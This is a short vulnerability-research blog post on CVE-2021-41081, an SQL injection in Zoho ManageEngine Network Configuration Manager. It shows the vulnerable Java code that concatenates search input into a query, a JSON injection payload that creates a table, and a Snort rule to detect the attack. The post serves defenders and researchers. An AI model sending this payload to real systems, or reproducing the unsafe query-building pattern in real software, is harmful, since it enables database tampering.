Vulnerability Research SQL Injection Snort

N-day Vulnerability Research (CVE-2021-41081)

| 3 min read

In this blog post we’ll explore the process of performing n-day vulnerability research.

The CVE-2021-41081 was assigned for SQL injection vulnerability issue in configuration search of Zoho ManageEngine Network Configuration Manager (NCM).

We can find more details about this vulnerability in the advisory.

Vulnerability Details
SeverityHigh
Reported07 Sep 2021
Fixed08-Sep-2021
Affected BuildsBuilds 123055 - 125464
Fixed inBuilds 125465/125436/125455
OverviewThe SQL injection vulnerability issue in configuration search has now been fixed.

We’ll go over each of the steps involved in the n-day vulnerability research:

  1. Obtain vulnerable and patched version of the product
  2. Create setup
  3. Perform source code diffing
  4. Perform root cause analysis
  5. Exploit
  6. Detection

1. Obtain Vulnerable and Patched Version

We can obtain the vulnerable version of Network Configuration Manager from the official source.

We’ll grab builds 125465 (fixed version) and 125451 (vulnerable version).

2. Create Setup

Install MSSQL Server and SQL Server Management Studio (SSMS). Install both NCM versions on separate VMs.

3. Source Code Diffing

Using IntelliJ IDEA to perform Java source code diffing, the relevant source files for this vulnerability are in lib/AdvNCM.jar. The classes NCMConfigCrawler.class and NCMMSSQLConfigCrawler.class were updated to mitigate this SQL injection vulnerability.

4. Root Cause Analysis

The criteria JSON key holds the configuration search criteria and is passed directly to SQL statement:

public String getCriteriaString() throws Exception {
    StringBuilder criteria = new StringBuilder();
    JSONArray advConfigSearchArr = this.searchCriteria.getJSONArray("criteria");
    
    for(int i = 0; i < advConfigSearchArr.length(); ++i) {
        JSONObject conditionObj = advConfigSearchArr.getJSONObject(i);
        String value = conditionObj.getString("value");
        String append = "( FILE_CONTENTS LIKE '%" + value + "%' )";
        // ... SQL statement built with user input
    }
    return criteria.toString();
}

5. Exploit

Following payload creates a new table named SQLi:

{
  "criteria": [
    {
      "andor": "or",
      "condition": "search",
      "value": "1' )); CREATE TABLE SQLi (a int); --"
    }
  ]
}

6. Detection

We can create a Snort rule to detect this exploitation attempt:

alert tcp $EXTERNAL_NET any -> $HOME_NET [$HTTP_PORTS,8060] ( \
    msg:"CVE-2021-41081 SQL Injection Attempt"; \
    flow:to_server,established; \
    content:"GET /client/api/json/ncmconfig/searchConfig"; fast_pattern:only; \
    content:"CONFIG_SEARCH_CRITERIA="; nocase; \
    content:"%22criteria%22"; distance:0; nocase; \
    content:"%22value%22"; distance:0; nocase; \
    content:"%27"; distance:0; within:30; nocase; \
    classtype:web-application-attack; \
    sid:1000000; \
)

Thank you for reading. I hope you found this blog post helpful!

~Amit